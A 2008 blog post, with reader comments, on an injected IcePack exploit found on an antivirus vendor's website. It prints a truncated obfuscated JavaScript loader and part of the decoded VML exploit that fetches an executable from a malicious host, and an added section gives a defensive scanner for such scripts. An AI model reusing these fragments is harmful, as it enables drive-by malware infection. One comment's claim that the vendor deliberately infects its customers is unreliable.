Antivirus company website is infected!!!
UPDATE (08/02): The malicious IFRAME has been removed. So web admins should know the various methods of attack, keep their sites and servers updated, and audit them.
What would you think if an antivirus company’s website were itself infecting its users? That is the most alarming situation in web security, and it shows the problem with surfing supposedly trusted websites.
The same happened to Delhi (India) based AVsoft Technologies’s antivirus website http://www.s-cop.com.
Their product “SmartCop Antivirus” is capable of detecting malware!
The infection is carried out by exploiting common vulnerabilities, using an encrypted script. In this case it looks like this:
<script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,37,11,46,55,34,16,14,60,58,0,0,0,0,0,0,18,24,29,45,6,38,48,41,61,50,33,17);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}dc("gPjEXVXIadA4ie8IN0zSARiSdT8eNqcLfhpMNhiIpq8vnqCIoVX5DypIW……….
which decrypts to
<html xmlns:v="urn:schemas-microsoft-com:vml"><head>
<object id="VMLRender" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">
</object>
<style>
v\:* { behavior: url(#VMLRender); }
</style>
</head>
<body><div id="myDivA"></div>
<script language="JavaScript">
function bxdbSGIA(Z0gP3oql, Bwpp5g4P)
{
while (Z0gP3oql.length*2<Bwpp5g4P) ….
function Attack(n)
{…
'<param name="src" value=" http://ntkrnlpa[dot]info/rc/exe[dot]
………
Just see the screenshots below…
All of this is used by “IcePack”, a tool infamous in underground networks!! You can see its admin console below.
This has already been reported to the concerned authorities.
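For the site audit the update above recommends, here is an added example (not code from the original post or from any tool named in it): a Node.js scanner that flags inline script blocks carrying the traits of the packed loader shown earlier. The trait list, the threshold and both sample pages are assumptions constructed for illustration.

```javascript
// Added example: static audit of served HTML for self-decoding inline scripts.
// Trait list and the 4-of-5 threshold are assumptions chosen for illustration.
const TRAITS = [
  ["charCodeAt", /\.charCodeAt\s*\(/],
  ["fromCharCode", /String\.fromCharCode\s*\(/],
  ["dynamicWrite", /document\.write\s*\(|\beval\s*\(/],
  ["bitMath", /<<|>>|\^/],
];
// A quoted run of 40+ opaque characters; the closing quote is not required.
const OPAQUE_LITERAL = /["'][A-Za-z0-9+\/=_-]{40,}/;

// Return every <script> body with its offset; an unclosed block runs to EOF.
function extractScripts(html) {
  const re = /<script\b[^>]*>([\s\S]*?)(?:<\/script\s*>|$)/gi;
  const blocks = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    blocks.push({ offset: m.index, body: m[1] });
  }
  return blocks;
}

// Names of the traits present in one script body.
function scriptTraits(body) {
  const hits = TRAITS.filter(([, re]) => re.test(body)).map(([name]) => name);
  if (OPAQUE_LITERAL.test(body)) hits.push("opaqueLiteral");
  return hits;
}

// Script blocks that carry at least minTraits traits and need manual review.
function auditPage(html, minTraits = 4) {
  return extractScripts(html)
    .map((s) => ({ offset: s.offset, traits: scriptTraits(s.body) }))
    .filter((s) => s.traits.length >= minTraits);
}

// Constructed samples: a benign page and a page with an appended packed block.
const CLEAN = '<html><script>document.write("<p>Updated " + new Date() + "</p>");</script></html>';
const INJECTED = "<html><body>ok</body></html>" +
  '<script language=JavaScript>function dc(x){var r="",w=0,s=0,p=0;' +
  "while(p<x.length){w|=(x.charCodeAt(p++)-48)<<s;r+=String.fromCharCode(1^w&255);w>>=8}" +
  'document.write(r)}dc("' + "A".repeat(64) + '")</script>';

console.log(auditPage(CLEAN), auditPage(INJECTED));
```

A flagged block is a candidate for manual review, not a verdict: minified legitimate libraries can also combine these traits.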
February 8, 2008 at 11:01 am
Antivirus company infects its own customers (ENG)
An Indian company that sells the SmartCop Antivirus product cripples it so that it does not detect malware, and makes use of a vulnerability to use an encrypted script to slip its customers the IcePack software, which is a tool for installing malwa…
February 8, 2008 at 12:40 pm
There are lots of other tools that do the same things, such as MPack, FirePack, WebAttackers.. The need is to have up-to-date software and to secure the program code so that no RFI or code injection